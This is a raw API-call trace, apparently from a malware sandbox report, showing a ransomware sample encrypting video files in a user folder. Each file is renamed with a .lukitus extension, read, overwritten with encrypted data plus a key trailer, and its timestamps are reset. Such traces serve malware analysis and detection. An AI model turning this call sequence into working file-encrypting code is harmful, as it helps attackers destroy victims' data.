[0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.991] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\h wpWI.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\h wpwi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.991] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\h wpWI.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\h wpwi.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-11DB606C-975B3B3752B2.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-11db606c-975b3b3752b2.lukitus"), dwFlags=0x9) returned 1 [0108.993] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.993] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.998] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7b3e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7b3e, lpOverlapped=0x0) returned 1 [0108.998] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.998] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7b3e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7b3e, lpOverlapped=0x0) returned 1 [0108.998] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.998] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64fe5870, dwHighDateTime=0x1d31760)) [0108.998] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.999] FlushFileBuffers (hFile=0x328) returned 1 [0109.001] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\I_LPQZX1r2pOZ.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\i_lpqzx1r2poz.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4a44e0, ftCreationTime.dwHighDateTime=0x1d2f67d, ftLastAccessTime.dwLowDateTime=0x1c63ee90, ftLastAccessTime.dwHighDateTime=0x1d2fbd6, ftLastWriteTime.dwLowDateTime=0x1c63ee90, ftLastWriteTime.dwHighDateTime=0x1d2fbd6, nFileSizeHigh=0x0, nFileSizeLow=0x3e91)) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.001] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.002] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\I_LPQZX1r2pOZ.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\i_lpqzx1r2poz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.002] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\I_LPQZX1r2pOZ.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\i_lpqzx1r2poz.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-603C0E3A-FCB2203116A2.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-603c0e3a-fcb2203116a2.lukitus"), dwFlags=0x9) returned 1 [0109.003] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.003] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.008] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3e91, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3e91, lpOverlapped=0x0) returned 1 [0109.009] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.009] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3e91, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3e91, lpOverlapped=0x0) returned 1 [0109.009] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65116370, dwHighDateTime=0x1d31760)) [0109.130] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.130] FlushFileBuffers (hFile=0x328) returned 1 [0109.141] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\mdlkCE 7Mu-OGE29yaZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\mdlkce 7mu-oge29yaz.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7111780, ftCreationTime.dwHighDateTime=0x1d2fa66, ftLastAccessTime.dwLowDateTime=0x7e234ff0, ftLastAccessTime.dwHighDateTime=0x1d30030, ftLastWriteTime.dwLowDateTime=0x7e234ff0, ftLastWriteTime.dwHighDateTime=0x1d30030, nFileSizeHigh=0x0, nFileSizeLow=0x1656f)) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.141] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.142] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\mdlkCE 7Mu-OGE29yaZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\mdlkce 7mu-oge29yaz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.142] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\mdlkCE 7Mu-OGE29yaZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\mdlkce 7mu-oge29yaz.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-75BCC747-2718C1ED972A.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-75bcc747-2718c1ed972a.lukitus"), dwFlags=0x9) returned 1 [0109.143] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.143] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.148] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1656f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1656f, lpOverlapped=0x0) returned 1 [0109.149] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.149] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1656f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1656f, lpOverlapped=0x0) returned 1 [0109.149] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65162630, dwHighDateTime=0x1d31760)) [0109.149] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.150] FlushFileBuffers (hFile=0x328) returned 1 [0109.152] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UETE8.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uete8.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ce58420, ftCreationTime.dwHighDateTime=0x1d30224, ftLastAccessTime.dwLowDateTime=0x822bbe60, ftLastAccessTime.dwHighDateTime=0x1d2fb86, ftLastWriteTime.dwLowDateTime=0x822bbe60, ftLastWriteTime.dwHighDateTime=0x1d2fb86, nFileSizeHigh=0x0, nFileSizeLow=0x8791)) returned 1 [0109.152] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.152] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.152] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.153] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UETE8.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uete8.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.153] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UETE8.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uete8.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-4B0F12D1-CA564F6CF8E9.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-4b0f12d1-ca564f6cf8e9.lukitus"), dwFlags=0x9) returned 1 [0109.155] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.155] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.159] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8791, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8791, lpOverlapped=0x0) returned 1 [0109.160] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.160] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8791, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8791, lpOverlapped=0x0) returned 1 [0109.160] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.160] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65162630, dwHighDateTime=0x1d31760)) [0109.160] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.161] FlushFileBuffers (hFile=0x328) returned 1 [0109.164] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UoYsAzDu.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uoysazdu.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39fef80, ftCreationTime.dwHighDateTime=0x1d3020f, ftLastAccessTime.dwLowDateTime=0x4d0600, ftLastAccessTime.dwHighDateTime=0x1d30122, ftLastWriteTime.dwLowDateTime=0x4d0600, ftLastWriteTime.dwHighDateTime=0x1d30122, nFileSizeHigh=0x0, nFileSizeLow=0x16734)) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.164] MultiByteToWideChar 